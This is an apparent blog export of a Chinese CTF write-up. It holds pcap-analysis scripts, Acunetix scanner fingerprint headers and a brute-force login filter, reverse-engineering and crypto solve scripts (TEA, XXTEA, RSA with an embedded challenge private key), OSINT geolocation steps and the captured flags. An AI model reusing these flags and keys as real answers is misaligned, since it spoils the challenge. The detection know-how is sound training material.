{"id":328,"date":"2025-06-15T20:26:54","date_gmt":"2025-06-15T12:26:54","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=328"},"modified":"2025-06-15T20:26:55","modified_gmt":"2025-06-15T12:26:55","slug":"escape-in-the-sun-cmctf-wp","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/escape-in-the-sun-cmctf-wp\/","title":{"rendered":"Escape in the sun CMCTF WP"},"content":{"rendered":"

\u6392\u540d6<\/p>\n

\"\"<\/p>\n

Misc<\/h2>\n

\u6bb5\u6db5\u6db5\u5b66\u59d0\u6700\u7231\u7684\u97f3\u4e50<\/h3>\n

\u591a\u89c6\u56fe\u79d2\u4e86<\/p>\n

\"\"<\/p>\n

CM{U_Kn0w_TaYLOR}<\/p>\n

\u6d41\u91cf\u5206\u6790-1<\/h3>\n

\"\"<\/p>\n

192.168.37.2\u5148\u5f00\u59cb\u626b\u7684<\/p>\n

CM{3deffe759c6c09462a583fe08d7c6034}<\/p>\n

\u6d41\u91cf\u5206\u6790-2<\/h3>\n
from scapy.all import rdpcap, IP, TCP, Raw\nfrom collections import defaultdict\npcap_file = \".\/\u6293\u53d6\u6d41\u91cf.pcapng\"  \npackets = rdpcap(pcap_file)\nscan_activity = defaultdict(set)\nfor pkt in packets:\n    if pkt.haslayer(IP) and pkt.haslayer(TCP):\n        src_ip = pkt[IP].src\n        dst_port = pkt[TCP].dport\n        if pkt.haslayer(Raw):\n            try:\n                payload = pkt[Raw].load.decode(errors='ignore')\n                if \"Host:\" in payload and (\"GET \/\" in payload or \"POST \/\" in payload):\n                    lines = payload.split(\"rn\")\n                    host = \"\"\n                    path = \"\"\n                    for line in lines:\n                        if line.startswith(\"Host:\"):\n                            host = line.split(\"Host:\")[1].strip()\n                        elif line.startswith(\"GET\") or line.startswith(\"POST\"):\n                            path = line.split(\" \")[1].strip()\n                    full_url = host + path\n                    scan_activity[src_ip].add(full_url)\n                else:\n                    scan_activity[src_ip].add(f\"port:{dst_port}\")\n            except:\n                continue\n# \u7edf\u8ba1\u626b\u63cf\u6b21\u6570\nscan_counts = {ip: len(targets) for ip, targets in scan_activity.items()}\n# \u6392\u5e8f\u5e76\u6253\u5370\u524d\u51e0\u540d\nsorted_counts = sorted(scan_counts.items(), key=lambda x: x[1], reverse=True)\n\n# \u8f93\u51fa\u7ed3\u679c\nfor ip, count in sorted_counts:\n    print(f\"{ip} \u626b\u63cf\u6b21\u6570: {count}\")<\/code><\/pre>\n
192.168.37.3 \u626b\u63cf\u6b21\u6570: 10970<\/p>\n
\"\"<\/p>\n
\u6d41\u91cf\u5206\u6790-4<\/h3>\n
awvs\u7684\u7279\u70b9<\/p>\n
    \n
  1. url<\/li>\n<\/ol>\n
    acunetix-wvs-test-for-some-inexistent-file\nby_wvs\nacunetix_wvs_security_test\nacunetix\nacunetix_wvs\nacunetix_test<\/code><\/pre>\n
      \n
    1. headers<\/li>\n<\/ol>\n
      Acunetix-Aspect-Password:\nCookie: acunetixCookie\nLocation: acunetix_wvs_security_test\nX-Forwarded-Host: acunetix_wvs_security_test\nX-Forwarded-For: acunetix_wvs_security_test\nHost: acunetix_wvs_security_test\nCookie: acunetix_wvs_security_test\nCookie: acunetix\nAccept: acunetix\/wvs\nOrigin: acunetix_wvs_security_test\nReferer: acunetix_wvs_security_test\nVia: acunetix_wvs_security_test\nAccept-Language: acunetix_wvs_security_test\nClient-IP: acunetix_wvs_security_test\nHTTP_AUTH_PASSWD: acunetix\nUser-Agent: acunetix_wvs_security_test\nAcunetix-Aspect-Queries:\u4efb\u610f\u503c\nAcunetix-Aspect:\u4efb\u610f\u503c<\/code><\/pre>\n
        \n
      1. body<\/li>\n<\/ol>\n
        acunetix_wvs_security_test\nacunetix<\/code><\/pre>\n
        \u627e\u5230192.168.37.1<\/p>\n
        CM{1edaa78b26c43a0cf438b4437f6ceeb3}<\/p>\n
        \u6d41\u91cf\u5206\u6790-6<\/h3>\n
        \u8fc7\u6ee4post\u6d41\uff0c\u627e\u7206\u7834login\u7684<\/p>\n
        192.168.37.87<\/p>\n
        CM{83779b479698b76581244f6ac8acd8a6}<\/p>\n
        \u6d41\u91cf\u5206\u6790-7<\/h3>\n
        \u6765\u81ea 192.168.37.87 <\/p>\n
        \u7528\u7edf\u8ba1\u5f97\u5230\u6b21\u6570\u4e3a106<\/p>\n
        CM{f0935e4cd5920aa6c7c996a5ee53a70f}<\/p>\n
        \u6d41\u91cf\u5206\u6790-8<\/h3>\n
        192.168.37.200<\/font>&zhoudi123
        \nhttp.request.method == "POST" && http.request.uri contains "login"
        \n\"\"<\/p>\n
        Web  <\/p>\n
        Pwn<\/p>\n
        re<\/h2>\n
        IDA<\/h3>\n
        \"\"<\/p>\n
        IDA\u6253\u5f00\u83b7\u5f97flag<\/p>\n
        XOR<\/h3>\n
        IDA\u6253\u5f00\uff0c\u5206\u6790\u4e00\u4e0b<\/p>\n
        \"\"<\/p>\n
        \u53ef\u4ee5\u770b\u5230key\u662f57<\/p>\n
        void __cdecl Xor(char *input, int key, int length)\n{\n  int i; \/\/ [rsp+Ch] [rbp-4h]\n\n  for ( i = 0; i < length; ++i )\n    input[i] ^= key;\n}<\/code><\/pre>\n
        \u5c31\u662f\u8fdb\u884cxor<\/p>\n
        \"\"<\/p>\n
        flag\u503c<\/p>\n
        exp:<\/p>\n
        flag_hex = [\n    0x5F, 0x55, 0x58, 0x5E, 0x42, 0x61, 0x09, 0x6B, 0x66, 0x08, 0x4A, 0x66,\n    0x0F, 0x79, 0x4A, 0x08, 0x5A, 0x66, 0x5F, 0x09, 0x4B, 0x66, 0x6B, 0x0A,\n    0x4F, 0x5C, 0x4B, 0x0C, 0x5C, 0x18, 0x44\n]\nkey = 0x39  # 57 \u7684\u5341\u516d\u8fdb\u5236\ncorrect_input = bytes([byte ^ key for byte in flag_hex]).decode('ascii')\nprint(\"Flag:\", correct_input)<\/code><\/pre>\n
        Maze<\/h3>\n
        \u8ff7\u5bab\u9898<\/p>\n
        raw_map = \"$11111111100111111111010000111001011011101101101110000110111111110011111111011111111101111111110000#\"\n# \u627e\u5230\u8d77\u70b9\u548c\u7ec8\u70b9\u4f4d\u7f6e\nstart_index = raw_map.find('$')\nend_index = raw_map.find('#')\n\n# \u6784\u9020\u7eaf\u5730\u56fe\u5b57\u7b26\u4e32\uff08\u5c06 $ \u548c # \u66ff\u6362\u6210 '0'\uff09\ngrid_data = list(raw_map)\ngrid_data[start_index] = '0'\ngrid_data[end_index] = '0'\n\n# \u6784\u5efa 10x10 \u7f51\u683c\nW, H = 10, 10\ngrid = [[grid_data[y * W + x] for x in range(W)] for y in range(H)]\n\n# \u8f6c\u6362 index \u4e3a\u5750\u6807\nstart = (start_index \/\/ W, start_index % W)\nend = (end_index \/\/ W, end_index % W)\n\n# BFS \u641c\u7d22\u6700\u77ed\u8def\u5f84\nfrom collections import deque\n\ndirs = {'W': (-1, 0), 'S': (1, 0), 'A': (0, -1), 'D': (0, 1)}\nqueue = deque()\nqueue.append((start[0], start[1], \"\"))  # y, x, path\nvisited = set()\nvisited.add((start[0], start[1]))\n\n# \u5b58\u50a8\u8def\u5f84\u70b9\u7528\u4e8e\u53ef\u89c6\u5316\npath_points = set()\nfinal_path = \"\"\n\nwhile queue:\n    y, x, path = queue.popleft()\n    if (y, x) == end and len(path) == 28:\n        final_path = path\n        break\n    if len(path) >= 28:\n        continue\n    for d, (dy, dx) in dirs.items():\n        ny, nx = y + dy, x + dx\n        if 0 <= ny < H and 0 <= nx < W:\n            cell = grid[ny][nx]\n            if cell == '0':\n                if (ny, nx) not in visited:\n                    visited.add((ny, nx))\n                    queue.append((ny, nx, path + d))\n\n# \u7528\u8def\u5f84\u6807\u8bb0\u8ff7\u5bab\nif final_path:\n    y, x = start\n    path_points.add((y, x))\n    for move in final_path:\n        dy, dx = dirs[move]\n        y += dy\n        x += dx\n        path_points.add((y, x))\n\n# \u6784\u9020\u5e26\u8def\u5f84\u7684\u53ef\u89c6\u5316\u5730\u56fe\nvisual_grid = []\nfor y in range(H):\n    row = \"\"\n    for x in range(W):\n        if (y, x) == start:\n            row += \"$\"\n        elif (y, x) == end:\n            row += \"#\"\n        elif (y, x) in path_points:\n            row += \"*\"\n        elif grid[y][x] == '1':\n            row += \"\u2588\"\n        else:\n            row += \"\u00b7\"\n    visual_grid.append(row)\nfinal_path, \"n\".join(visual_grid)\n# \u8f93\u51fa\u6700\u7ec8\u8def\u5f84\u548c\u53ef\u89c6\u5316\u5730\u56fe\nprint(\"Final Path:\", final_path)\nprint(\"n\".join(visual_grid))<\/code><\/pre>\n
        \"\"<\/p>\n
        \"\"<\/p>\n
        sw1f7's TEA<\/h3>\n
        key[0] = 36<\/code>\u3001key[1] = 66<\/code>\u3001key[2] = 82<\/code>\u3001key[3] = 118<\/code><\/p>\n
        encrypt<\/code> \u51fd\u6570\u63a5\u6536\u4e24\u4e2a 32 \u4f4d\u65e0\u7b26\u53f7\u6574\u6570\uff08v0<\/code> \u548c v1<\/code>\uff09\u4f5c\u4e3a\u660e\u6587\uff0c\u4ee5\u53ca\u4e00\u4e2a 128 \u4f4d\u7684\u5bc6\u94a5 k<\/code>\u3002\u5b83\u6267\u884c\u4e00\u4e2a\u5faa\u73af 32 \u6b21\u7684\u52a0\u5bc6\u8fc7\u7a0b\u3002  <\/p>\n
        .data<\/code> \u6bb5\u4e2d\uff0cflag<\/code> \u7684\u503c\u662f\uff1a 0x5B5C5F08, 0x2766AE05, 0x8C4D477D, 0x554F7F8D, 0xE20BD674, 0xBE678AA, 0xF44B5224, 0xCA619F04<\/code><\/p>\n
        import struct\ndef decrypt(v, k):\n    v0, v1 = v[0], v[1]\n    sum = 0xC6EF3720 \n    DELTA = 0x61C88647\n    for i in range(32):\n        v1 = (v1 - ((v0 + sum) ^ (k[2] + 16 * v0) ^ ((v0 >> 5) + k[3]))) & 0xFFFFFFFF\n        v0 = (v0 - ((v1 + sum) ^ (k[0] + 16 * v1) ^ ((v1 >> 5) + k[1]))) & 0xFFFFFFFF\n        sum = (sum + DELTA) & 0xFFFFFFFF\n    return [v0, v1]\nkey = [0x24, 0x42, 0x52, 0x76]\nencrypted_flag_uints = [\n    0x5B5C5F08, 0x2766AE05,\n    0x8C4D477D, 0x554F7F8D,\n    0xE20BD674, 0xBE678AA,\n    0xF44B5224, 0xCA619F04\n]\ndecrypted_bytes = b\"\"\nfor i in range(0, len(encrypted_flag_uints), 2):\n    v_chunk = [encrypted_flag_uints[i], encrypted_flag_uints[i+1]]\n    decrypted_chunk_uints = decrypt(v_chunk, key)\n    decrypted_bytes += struct.pack(\"<II\", decrypted_chunk_uints[0], decrypted_chunk_uints[1])\nprint(decrypted_bytes.decode('utf-8'))<\/code><\/pre>\n
        sw1f7's XXTEA<\/h3>\n
        XXTEA<\/p>\n
        encrypted_flag = [<\/p>\n
            0x19EA7A62, 0x05BE6801, 0xD2AD8A17, 0x1A1456A1,\n\n    0x843B635B, 0xE2369508, 0xBF552654, 0xFC87047C\n\n]<\/code><\/pre>\n
        key = [0x24, 0x42, 0x52, 0x76]<\/p>\n
        import struct\ndef decrypt_tea(v, key):\n    n = len(v)\n    delta = 0x61C88647\n    rounds = 52 \/\/ n + 6\n    sum_ = (0 - delta) * rounds & 0xFFFFFFFF\n    y, z = v[0], v[-1]\n\n    for _ in range(rounds):\n        e = (sum_ >> 2) & 3\n        for p in range(n - 1, 0, -1):\n            z = v[p - 1]\n            v[p] = (v[p] - (\n                ((y ^ sum_) + (z ^ key[(e ^ p) & 3])) ^\n                (((4 * y) ^ (z >> 5)) + ((y >> 3) ^ (16 * z)))\n            )) & 0xFFFFFFFF\n            y = v[p]\n\n        z = v[-1]\n        v[0] = (v[0] - (\n            ((y ^ sum_) + (z ^ key[e & 3])) ^\n            (((4 * y) ^ (z >> 5)) + ((y >> 3) ^ (16 * z)))\n        )) & 0xFFFFFFFF\n        y = v[0]\n\n        sum_ = (sum_ + delta) & 0xFFFFFFFF\n\n    return v\n\ndef words_to_bytes(words):\n    \"\"\"\n    \u5c0632\u4f4d\u6574\u578b\u5217\u8868\u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\n    \"\"\"\n    return b''.join(struct.pack('<I', word) for word in words)\n\ndef try_decode_flag(flag_bytes):\n    \"\"\"\n    \u5c1d\u8bd5\u89e3\u7801\u5b57\u8282\u4e3a\u5b57\u7b26\u4e32\n    \"\"\"\n    try:\n        return flag_bytes.decode('utf-8').strip('x00')\n    except UnicodeDecodeError:\n        return None\nif __name__ == '__main__':\n    encrypted_flag = [\n        0x19EA7A62, 0x05BE6801, 0xD2AD8A17, 0x1A1456A1,\n        0x843B635B, 0xE2369508, 0xBF552654, 0xFC87047C\n    ]\n    key = [0x24, 0x42, 0x52, 0x76]\n    decrypted_words = decrypt_tea(encrypted_flag.copy(), key)\n    flag_bytes = words_to_bytes(decrypted_words)\n    flag_str = try_decode_flag(flag_bytes)\n    if flag_str:\n        print(\"\u89e3\u5bc6\u540e\u7684 flag:\", flag_str)\n    else:\n        print(\"\u89e3\u5bc6\u540e\u7684\u5b57\u8282:\", flag_bytes)\n        print(\"HEX\u8868\u793a:\", flag_bytes.hex())\n        print(\"\u65e0\u6cd5\u89e3\u7801\u4e3a\u6709\u6548\u7684\u5b57\u7b26\u4e32\")<\/code><\/pre>\n
        crypto<\/h2>\n
        \u6124\u6012\u7684\u7b11\u7b11<\/h3>\n
        \u6590\u6ce2\u90a3\u5951\u7528\u4e00\u4e0b\u77e9\u9635\u5feb\u901f\u5e42\uff0c\u53ef\u4ee5\u6bd4\u9012\u5f52+\u8bb0\u5fc6\u5316\u641c\u7d22\u5feb\u4e00\u70b9<\/p>\n
        \u540e\u9762\u7684lfsr\u6ca1\u5565\u597d\u8bb2\uff0c\u89e3\u4e2a\u65b9\u7a0b\u5c31\u597d<\/p>\n
        from Crypto.Util.number import *\n\ndef fib(n):\n    def multiply(F, M):\n        x = F[0][0]*M[0][0] + F[0][1]*M[1][0]\n        y = F[0][0]*M[0][1] + F[0][1]*M[1][1]\n        z = F[1][0]*M[0][0] + F[1][1]*M[1][0]\n        w = F[1][0]*M[0][1] + F[1][1]*M[1][1]\n        F[0][0], F[0][1] = x, y\n        F[1][0], F[1][1] = z, w\n\n    def power(F, n):\n        if n == 0 or n == 1:\n            return\n        M = [[1, 1], [1, 0]]\n        power(F, n \/\/ 2)\n        multiply(F, F)\n        if n % 2 != 0:\n            multiply(F, M)\n\n    F = [[1, 1], [1, 0]]\n    if n == 0:\n        return 0\n    power(F, n - 1)\n    return F[0][0]\n\nn = 121445040208861909069894403265135678065120910909862499020293974222353911252357668566443655271324561444629423085857365441663340335267122084303353024719970701684304078915449107665234153848865575171396266594850387632166116876666641345151524526093750743311423760629508920605398826413219456966060130654182319239622853235598419783244961101023565485613969127617211798200257784669487075518232217287821539002272955530731559925743819394303592463643472505544371511975391525417372030795124188756668359793712687313915869489834990149406102691674251037529200092462351869985445609978956083451480606196410709785266414297484270955804000909874710243291131008074987501840685895810982539715865808340785585783784932746009294793388111303497827361597667080060904233538640411944294069905932767542941079924615545492728930748632793138167526456821615565265643786589492447320384175015988885891762397927722597983943795776730381090838150325379769514627877859254280292596379986317145513592309694492391589942506965514462458275558089505709047707881858666740272995276712061033659325342969092555904181602954831675187019667837919000590097455240471706803903843864588874240819424978016149001940435459574272517121404191497401282693543020081054458057536135286337530413794162493772935203185468003808946179794587532129108140773036801981194625504026220172240941266669713633255771146945596494369563639162958148338997083151465760140380287388970013418518808560606190028648382869570465274426248220666799284598328143667941885780739645827723387774853960763697674935365788526188525877728188039212192465886463099601345762532695705673402546191349122040406356859512156595066368962709427340711912079526354041896\nc = 56588793843319337746724191421797882919298382185789212342757993436535833538835522763229763594877667021903450245810685457239006347519758531527469886935960286141037132766391893854072489010976740737632329381497939974348685705638979763163979105135831966969462502212645331623912058124799565947994143213185185992532880019990646317265334164877775033560523059626818443959011448004361903639117592816084037679180458435582475302588998924848174547895790261541575925513887774899878433973389508964314168199120579798596134069816522786705872922325579820616825662181444792078041146420951204474840017339067144121627577361659204068184374437536021834866744629203173525452975550210170854689131249911980147698258676007773287058650732712430646538052932526385903664366173103845251460027428058991440409897707266114313760974556093019272676530729679647453145281642248231912623556282846880428854082954278583510952137984285948462279982465734721299949983519379129012579754979967314981583010596156968017750652218444293183553797064562640415021018922337530706623720329914512691891247157484346793520829716469015298628414649436647705362645773660510066453649321698837054590345696220371667776079460869975651358713981526804058124260167477067800116925869645048296793453667948263141449977001998111471446893535134204947903797920023508228450635623912282556920844859004265256776076205404744691901113660811077768891817723583726923916755419376617397161631255119342712941347511133994305902274463032094437850518737799347513359266736626688000378302129740278671252372100118745385045165006411579452656230211530847834481096650640749089767353846648834690606914589383720715808010950418989797804848844908028168\nhint = 18294419705033749803018183186096112152402551291430209346583558472922013290690589800566513840852313152850815949693453061822473006436564091423275427734726183402882773876530619900017570008504487011496639900712276814180156892043893283337592870931604509182121126729757414875305980944401674021305109901787373919069250888132010941446377885033954783641074524904335530439232153795506796131799840815859332631629520548237546341180970993275196594743629686044240376562797833663497706050016975314637814732243863519275581657562824577416520887857531300484034288184348876435266599982852899863511077867993896260185876623577916847805434018960645048222193073045995417189741052112103530337456864569791619370910540989544825643388189316375353130601280427411097634982360164150650121200938121132975127392218810406251814769876585467670838768851084325019437401290895892649127468159357644376855642219871658242665316842174539950982501562012993620707848235840777465439382427694385975143409696608524006610718341269938590805893846551221772802799937388082484101818519470210469287886673559139819764993972650754106595274703362578095021666440413181006787169326119053179113634896719904706459255688323355422629750624744361016321749825711352381979526373745414466117496901188899402968884557897042915393081588659355938084179373516472500982821481620361825619098189709268749353026527626333126253300709023279752604686313218745191179635948042935114535230124092175888272591892209973826349925162305622280085164752927856768903063667002948252367704955505382627077430221515644243237639648659331074231756506975066652222700589414902433234306276129685280949801672748996080027431076564977892352264341740524147048337215454135414149313442308392992893543348489794522704133497959650612938856771407888345435215493938925195892269263980872231297338970570968594859288833461843787177471203855945919703978692377984\n\nr = int(fib(2022))\nassert n%r == 0\nn \/\/= r\n\ne = 0o10001\nd = pow(e, -1, hint)\nm = pow(c, d, n)\nenc1 = long_to_bytes(m)\nprint(enc1) # 1241234123214\n\ndef init(state):\n    result = [int(i) for i in bin(state)[2:]]\n    PadLenth = 128 - len(result)\n    result = [ 0 ] * PadLenth + result\n    assert len(result) == 128\n    return result\n\ndef solve_GF2_linear_system(A, b):\n    \"\"\"\n    \u4f7f\u7528 SageMath \u5728 GF(2) \u4e0a\u6c42\u89e3\u7ebf\u6027\u65b9\u7a0b\u7ec4 Ax = b\n    :param A: \u7cfb\u6570\u77e9\u9635\n    :param b: \u7ed3\u679c\u5411\u91cf\n    :return: \u89e3\u5411\u91cf x\n    \"\"\"\n    F = GF(2)\n    A_GF2 = Matrix(F, A)\n    b_GF2 = vector(F, b)\n\n    try:\n        x = A_GF2.solve_right(b_GF2)\n        return x\n    except ValueError:\n        return None\n\ndef solution(m):\n    a,b = m[0],m[1]\n    solution = solve_GF2_linear_system(a, b)\n    if solution:\n        print(f\"\u89e3\u5411\u91cf\u4e3a: {solution}\")\n        return solution\n    else:\n        print(\"\u65e0\u89e3\")\n        return None\n\ndef change(seed,random):\n    All = seed + random\n    a = [[0]*128 for _ in range(128)]\n    b = random\n    for i in range(128):\n        a[i] = All[i:i+128]\n    return (a,b)\n\nrandom1 =  176011035589551066670092363165068881602\nrandom2 =  157117237038314150714243518116791116977\n\nrandom1,random2 = map(init, [random1,random2])\n\nans = solution(change(random1,random2))\nmask = int(\"\".join(str(i) for i in ans),2)\nmask = long_to_bytes(int(mask))\nprint(mask) # B1e_ju@n_le_QAQ!\n\nflag = b'CMCTF{' + enc1 + mask  + b'}'\n\nprint(flag)\n\n# CMCTF{1241234123214B1e_ju@n_le_QAQ!}\n<\/code><\/pre>\n
        Base141<\/h3>\n
        \"\"<\/p>\n
        RSA\u4f60\u592ababy\u4e86<\/h3>\n
        import base64\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_v1_5\nhex_ciphertext = \"\"\"\n6b 4d 31 77 67 6f 43 47 4f 77 52 66 45 32 6f 46 30 6d 6a 30 77 32 6a 71 36 59 6d 6a 38 4e 6b 69 39 36 36 68 59 66 43 71 70 2b 4f 42 63 54 33 6f 7a 49 66 74 4c 74 61 44 52 79 65 45 72 53 2f 68 46 79 33 6c 38 53 6a 35 49 54 75 47 43 35 6d 55 52 50 58 41 30 4b 42 77 45 73 36 37 6c 37 69 46 37 74 39 7a 6e 54 51 4b 31 41 57 6c 74 46 5a 47 4d 36 74 62 77 6b 33 56 54 54 59 43 72 52 54 36 41 65 6a 74 79 41 6f 59 7a 70 62 76 53 79 46 4e 59 37 2b 73 62 50 74 58 77 79 41 2b 30 6a 63 43 79 61 57 32 49 41 56 63 56 77 6e 44 65 4d 38 54 6c 68 34 35 7a 6f 41 50 56 62 77 63 4f 69 57 78 55 62 79 43 4c 49 48 6b 30 72 55 58 53 76 47 39 34 33 67 50 6d 76 53 71 73 39 4b 66 6d 52 4a 5a 4b 6e 52 6c 73 62 42 47 58 44 77 5a 6f 34 38 6b 67 58 4d 52 36 5a 33 4a 54 6b 75 42 37 47 33 44 44 53 78 78 78 45 69 77 38 38 64 2f 54 78 65 6c 59 61 78 39 72 73 63 75 74 56 6a 67 35 71 48 58 6e 43 46 6c 70 47 4e 2b 7a 51 34 46 63 50 77 44 6f 52 48 58 50 79 61 52 43 5a 61 52 37 63 70 50 65 63 72 47 66 54 55 2f 2b 41 59 53 7a 4c 37 4b 76 75 6b 71 31 41 3d 3d\n\"\"\"\n\nprivate_key_pem = \"\"\"-----BEGIN PRIVATE KEY-----\nMIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDoJqsE20fcEWu+\nWfizvGn6GN8Ae\/aJxh2tjpZR7KsXYmuqdDTSmVsWXo3mnI5Z6oCGAynuc3gxHPPb\npZGjxxf0QYvjPTs7FRC3u162ph8KF7EPSMq7KvJjbBgI8qrGc4CUy2UpFWjha9EW\nfDGyKBkqnjzeVvfkPdMhZajcZCp3atsvVg6yPKpH3Tum\/Lo4Cf831OKbRnQKnr6H\n0HSs2ECP2ZPLBtMIEUHLJ2DbM4Gul9lZ5Ecu\/MZSBForWufskbdJw+5KLH0wWKpW\nE3y5sWHb4N3t6azZzLcu1xweRorsUQs+5SdU8nlsF0o9aVHcsII6sJxWUj5eofv7\n2\/c5dykVAgMBAAECggEABUj8E7w6QpRS855wvwbHEt6GFSi9UB2mh1D7sxnEO2AO\nO28x1KmRHU1BxcJCq2FfU622wqr2TYfvNUzrp+LcdL8ZRC8crheorcYiPd5CTqSD\nb2mk0+YCZqkLUwjTQnlWsAyBXRITtS4TMIPbTccD66h2kklAk32k1NnPolTVcqp9\nANMgWlCwwCCnngw9ppE0S+kC7lQO\/Qf\/ZKMuqETEdoCMbC2AfgcyFc\/AXddZ+H8J\n629pWeDFQO3CPlSrGy\/FM0IYA8Dmm\/9c3Pf31Qy3yby+2G\/Obryyl7BWTWiRIi+m\nTF2n1\/QCJp7yXTu3DRUffRpvBxfx2aK2chv\/5PKUcQKBgQD4eYciwO3reDMM7dPT\nMsECpVVJ8Nwf5EGj4H\/Hu2upZ2pOygcrw9XTxw54iRQxvrXokXzX\/6UOnvXq47VQ\nOq7fqBu3x1CclvJLYn3jV7Z4g7dPyo5fKTkG4PM45tIoJEJZr92va7VFVviU0U+X\n83xHMvA547QmrZLJIrKe66BXKwKBgQDvLpRhvlckP0uDXTdd9bIwirlyWDq\/B6cn\nlbcPLpsim5Bl0q8892rEUgYAwVsOE2X8tlTEwSqRqO5RwKCKrfX+O4P2XaPhIaP+\nH13ehvKIJqe9SrVoBST2PknPA3zfOHsM1mpDeWSmP3vhUPobO4iNAe5Yk7zQupJF\n7KU58XJgvwKBgHy+Vm\/GOCwNLmQBSmUvh+LSKl1yxLBmIeYqITyfBVAJET\/5AVyh\ndspZlxRAjZjjy+O0lt7CA5WxjHieVTqwG3dBqJi9QeU7iuz5x4XJVVxvlCpE4PE5\net3PNYyNpVhty7nHJx6Yjmr\/XNEpvDHnFa+RDTWi8aCxZ43\/E3nhhZ\/9AoGAZEpL\nvZBqSbCgoTx88tELHn+Msv175I348Qg98gfA1QoVyhxFjnLQOfGKwtZQr95CbWym\nrrmwd9M12uHCb2PyOeAKvUsWZFgOw4ezfJNpLt3GiADDgBJoJTiJClyUB6VPM1rU\nw+Yq5erIrvmdZb3YzAd7QXjxOzSAEQHhZiJvq1ECgYAeRnIejF8KXIVpnBpkVcDP\nnQGbb8LcrlC3ONHQrbl6c1FCK4Ht38t+vbu32+rdSVtc+Sxccaqxs0md6\/4O6UYd\nWDZuLvtpugTi8Dw\/4HjPojDK1rxysCJcrxLIQlpwqsrha6sf68EraTK714Qh9nU5\nDPgfC51MVmo4fKt2mhHBKg==\n-----END PRIVATE KEY-----\"\"\"\n# \u6e05\u7406\u5e76\u8f6c\u6362\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\nhex_str = ''.join(hex_ciphertext.split())\nciphertext = base64.b64decode(bytes.fromhex(hex_str))\n# \u52a0\u8f7d\u79c1\u94a5\nkey = RSA.import_key(private_key_pem)\ncipher = PKCS1_v1_5.new(key)\n# \u89e3\u5bc6\ntry:\n    plaintext = cipher.decrypt(ciphertext, None)\n    print(\"\u89e3\u5bc6\u7ed3\u679c:\", plaintext.decode('utf-8'))\nexcept Exception as e:\n    print(\"\u89e3\u5bc6\u5931\u8d25:\", str(e))<\/code><\/pre>\n
        CM{Y0u_kn0w_ba6y_R5A}<\/p>\n
        OSINT<\/h2>\n
        \u675c\u6d69\u5b66\u59d0\u306e\u670b\u53cb\u5708<\/h3>\n
        \u6ce8\u610f\u5230\u56fe\u7247\u4e0a\u6709\u4eae\u5149logo \uff0c\u4e14\u662f\u955c\u50cf\u7684\uff0c\u5148\u628a\u56fe\u7247\u7ffb\u8f6c<\/p>\n
        \"\"<\/p>\n
        \u6ce8\u610f\u5230\u51e0\u4e2a\u70b9\uff1a\u9b45ktv\u3001city\u82b1\u56ed\u57ce<\/p>\n
        \"\"\"\"<\/p>\n
        \u76f4\u63a5\u5730\u56fe\u53d1\u529b<\/p>\n
        \"\"<\/p>\n
        \u6240\u4ee5\u8fd9\u5730\u65b9\u662f\u5357\u4eac\uff0c\u9694\u58c1\u5c31\u662f\u4e07\u5bff\u5730\u94c1\u7ad9<\/p>\n
        flag{Nanjing-\u4e07\u5bff}<\/p>\n
        \u675c\u6d69\u5b66\u59d0\u306e\u65c5\u884c<\/h3>\n
        \"\"<\/p>\n
        \u8fd9\u4e2a\u673a\u578b\u770b\u7ffc\u5c16\u53ef\u4ee5\u77e5\u9053\u662fA380\u5ba2\u673a<\/p>\n
        \u7ffc\u5c16\u6d82\u88c5\u611f\u89c9\u4e0d\u662f\u56fd\u5185\u822a\u53f8\uff0c\u6211\u641c\u4e86\u641c\u611f\u89c9\u50cf\u662f\u65e5\u672c\u7684\u4e50\u6843\u822a\u7a7a<\/p>\n
        \u7136\u540e\u770b\u5730\u9762\u7684\u8bdd\u5e94\u8be5\u662f\u6cbf\u6d77\uff0c\u9ad8\u5ea6\u8bf4\u660e\u521a\u8d77\u98de\u6216\u8005\u9a6c\u4e0a\u7740\u9646\uff0c\u5e94\u8be5\u5f53\u524d\u4f4d\u7f6e\u79bb\u673a\u573a\u4e0d\u8fdc\uff0c\u91cd\u70b9\u627e\u4e00\u627e\u673a\u573a\u5728\u5165\u6d77\u53e3\u9644\u4ef6\u7684\uff0c\u4e14\u8fd9\u662f\u4e2a\u6cbf\u6d77\u53d1\u8fbe\u57ce\u5e02<\/p>\n
        \u5bf9\u7684\u6ca1\u9519\uff0c\u601d\u8def\u5f88\u5bf9\uff0c\u90a3\u4e48\u4f18\u5148\u67e5\u9605\u8fd9\u4e2a\u822a\u53f8\u7684\u56fd\u9645\u822a\u73ed\u65f6\u523b\u8868<\/p>\n
        \"\"<\/p>\n
        \u7136\u540e\u822a\u7ebf\u53ea\u6709\u5173\u897f\u5230\u6d66\u4e1c\u548c\u5173\u897f\u5230\u9999\u6e2f\uff0c\u67e5\u770b\u536b\u661f\u5730\u56fe\u53ef\u4ee5\u6392\u9664\u6d66\u4e1c\u548c\u9999\u6e2f\uff0c\u4e8e\u662f\u6700\u540e\u5728\u5173\u897f\u9644\u8fd1\u627e\u5230\u4e86\u548c\u6b4c\u5c71\u5e02<\/p>\n
        \"\"<\/p>\n
        Mobile<\/h2>\n
        base_android<\/h3>\n
        0.o\uff1f\uff1f\uff1f\uff1f<\/p>\n
        \"\"<\/p>\n
        flag{08067-wlecome}  <\/p>\n
        web<\/h2>\n
        \u5c0f\u733f\u53e3\u7b97<\/h3>\n
        \u901f\u7b97\u9898\uff0cai\u51fa\u4e2a\u811a\u672c<\/p>\n
